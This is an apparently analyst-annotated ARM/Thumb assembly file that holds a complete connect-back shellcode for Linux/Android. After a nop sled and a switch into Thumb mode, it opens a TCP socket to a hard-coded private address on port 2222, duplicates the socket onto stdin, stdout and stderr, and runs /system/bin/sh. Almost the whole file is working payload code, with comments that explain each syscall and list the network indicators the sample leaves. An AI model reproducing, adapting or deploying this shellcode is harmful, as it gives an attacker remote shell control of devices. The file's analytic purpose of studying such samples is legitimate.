@ Entry stub, assembled as 32-bit ARM code: a run of 16 nops followed by an
@ interworking branch into the Thumb code at `thumb`.
@ Syntax: GNU as for ARM (`@` starts a comment).
@ The file does not say why the nop run is there; it is 64 bytes that do
@ nothing before the mode switch.
.globl _start
.align 2                @ on ARM targets the operand is a power of two: 4-byte alignment
_start:
.code 32                @ assemble what follows as ARM (A32) instructions
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
adr r0, thumb + 1       @ r0 = address of `thumb` with bit 0 set (bit 0 = 1 selects Thumb on bx)
bx r0                   @ branch-and-exchange: execution continues at `thumb` in Thumb state
@ Thumb payload: a connect-back shell for Linux/Android on ARM (EABI syscalls:
@ number in r7, arguments in r0-r2, trap with `swi #0`, result in r0).
@
@ Sequence, in C terms:
@   fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
@   connect(fd, &addr, 16);
@   dup2(fd, 0); dup2(fd, 1); dup2(fd, 2);
@   execve("/system/bin/sh", { "/system/bin/sh", NULL }, NULL);
@   exit(0);
@
@ Register roles: r4 = socket fd, kept across the syscalls; r7 = syscall number.
@ No syscall return value is checked anywhere in the sequence.
@
@ What this leaves for an analyst to observe on a device: an outbound TCP
@ connection to the endpoint stored at `addr`, and a /system/bin/sh process
@ whose descriptors 0, 1 and 2 all refer to that socket.
thumb:
.code 16                @ assemble what follows as 16-bit Thumb instructions
mov r0, #2 @ domain = AF_INET
mov r1, #1 @ type = SOCK_STREAM
mov r2, #6 @ protocol = IPPROTO_TCP
mov r7, #250            @ Thumb mov takes an 8-bit immediate, so 281 is built in two steps
add r7, #31             @ r7 = 281 (socket on ARM EABI)
swi #0 @ socket
mov r4, r0              @ keep the returned fd; r0 still holds it for connect below
adr r1, addr            @ r1 = pointer to the sockaddr_in at `addr`
mov r2, #16             @ addrlen = 16 (sizeof(struct sockaddr_in))
mov r7, #250
add r7, #33             @ r7 = 283 (connect on ARM EABI)
swi #0 @ connect
mov r0, r4              @ r0 is reloaded from r4 before each dup2 because the syscall overwrites it
mov r1, #0 @ STDIN
mov r7, #63             @ 63 = dup2
swi #0 @ dup2
mov r0, r4
mov r1, #1 @ STDOUT
mov r7, #63
swi #0 @ dup2
mov r0, r4
mov r1, #2 @ STDERR
mov r7, #63
swi #0 @ dup2
adr r0, systembinsh     @ r0 = pointer to the path string
mov r1, #0
push {r1}               @ argv[1] = NULL
push {r0}               @ argv[0] = path
mov r1, sp              @ r1 = argv, the two-word array just pushed
mov r2, #0              @ envp = NULL
mov r7, #11             @ 11 = execve
swi #0 @ execve
mov r0, #0              @ reached only if execve returned: exit status 0
mov r7, #1              @ 1 = exit
swi #0 @ exit
nop                     @ 2-byte pad; by instruction count this appears to place `addr` on a 4-byte boundary, which the Thumb adr loads above need — confirm against the assembled output
@ Embedded data referenced by the Thumb code through pc-relative `adr`.
@
@ `addr` is the sockaddr_in handed to connect(). Only 8 bytes are laid out
@ here while connect() is called with a length of 16, so the remaining 8 bytes
@ (the sin_zero padding field) are whatever follows in memory, i.e. the first
@ bytes of the path string below.
@ The port and IPv4 address are the hard-coded network indicators of this sample.
addr:
.short 2 @ sin_family = AF_INET (host byte order; assumes a little-endian target)
.ascii "\x08\xAE" @ sin_port in network byte order: 0x08AE = 2222
.byte 192, 168, 3, 74 @ sin_addr = 192.168.3.74 (RFC 1918 private range)
@ NUL-terminated program path for execve(); /system/bin/sh is where Android keeps its shell.
systembinsh:
.asciz "/system/bin/sh"